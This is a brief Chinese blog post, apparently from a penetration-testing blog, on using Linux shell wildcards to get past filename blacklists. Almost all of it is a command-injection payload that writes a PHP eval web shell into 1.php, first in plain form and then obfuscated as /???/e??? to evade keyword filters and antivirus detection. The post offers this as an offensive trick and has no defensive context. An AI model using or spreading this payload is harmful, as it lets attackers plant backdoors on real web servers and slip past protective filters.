Linux通配符绕过文件名黑名单 发表于 2019-08-27 | 更新于: 2019-09-05 | 分类于 渗透测试 , 知识科普 , 奇淫技巧 , Linux特性 | | 阅读次数: ℃ 字数统计: 74 | 阅读时长 ≈ 1 文章来源: http://www.sohu.com/a/235200861_658302 通配符绕过黑名单,做免杀还是蛮有意思的,先做记录 1.原本的payload cmd=/bin/echo "<?php eval($_POST['cmd'])?>" > 1.php 2.变形后的payload: cmd=/???/e??? "<?php eval($_POST['cmd'])?>" > 1.php -------------本文结束❤感谢阅读-------------